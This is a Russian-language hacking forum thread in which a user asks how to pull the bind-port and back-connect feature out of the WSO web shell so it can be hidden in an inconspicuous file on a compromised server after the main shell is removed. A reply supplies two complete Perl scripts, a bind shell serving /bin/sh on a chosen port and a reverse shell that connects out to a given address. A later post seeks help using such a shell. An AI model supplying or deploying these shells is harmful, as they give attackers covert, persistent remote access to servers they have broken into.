Бинд-порт

Discussion in 'Уязвимости' started by Pirotexnik, 30 Aug 2012.

  1. Pirotexnik

    Pirotexnik Banned

    Joined:
    13 Oct 2010
    Messages:
    365
    Likes Received:
    68
    Reputations:
    38
    В всо реализован встроенный биндпорт и бэк коннект.

    Тоесть в темпе создается перловый скрипт, биндится порт и скрипт сносится, так?

    Как вырезать эту штуку из всо для отдельного использования?
    Например спалили шелл, удалили. А в какой-то неприметный файлик можно воткнуть этот скрипт.

    Спасибо.
     
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    биндпорт

    Code:
    #!/usr/bin/perl
    
    $SHELL="/bin/sh -i";
    
    if (@ARGV < 1) { exit(1); }
    
    use Socket;
    
    socket(S,&PF_INET,&SOCK_STREAM,getprotobyname('tcp')) || die "Cant create socket\n";
    
    setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
    
    bind(S,sockaddr_in($ARGV[0],INADDR_ANY)) || die "Cant open port\n";
    
    listen(S,3) || die "Cant listen port\n";
    
    while(1) {
    
    	accept(CONN,S);
    
    	if(!($pid=fork)) {
    
    		die "Cannot fork" if (!defined $pid);
    
    		open STDIN,"<&CONN";
    
    		open STDOUT,">&CONN";
    
    		open STDERR,">&CONN";
    
    		exec $SHELL || die print CONN "Cant execute $SHELL\n";
    
    		close CONN;
    
    	
    	exit 0;
    
    	}
    
    }
    
    бек.

    Code:
    #!/usr/bin/perl
    
    use Socket;
    
    $iaddr=inet_aton($ARGV[0]) || die("Error: $!\n");
    
    $paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n");
    
    $proto=getprotobyname('tcp');
    
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    
    connect(SOCKET, $paddr) || die("Error: $!\n");
    
    open(STDIN, ">&SOCKET");
    
    open(STDOUT, ">&SOCKET");
    
    open(STDERR, ">&SOCKET");
    
    system('/bin/sh -i');
    
    close(STDIN);
    
    close(STDOUT);
    
    close(STDERR);
    
    посмотрели бы исходники WSO, тела скриптов лежат внутри переменной, кодированные в base64
     
    _________________________
    #2 Konqi, 30 Aug 2012
    Last edited: 30 Aug 2012
    1 person likes this.
  3. RexelNet

    RexelNet Member

    Joined:
    21 Oct 2010
    Messages:
    20
    Likes Received:
    6
    Reputations:
    -5
    есть серв с забинденным портом , выбераю telnet , подключаюсь норм, но не выполняются команды , и не выводится результат что делать? был вариант искать рутнутый ssh Но так как нет в наличии таких, отпадает вариант, что посоветуете?
     
Loading...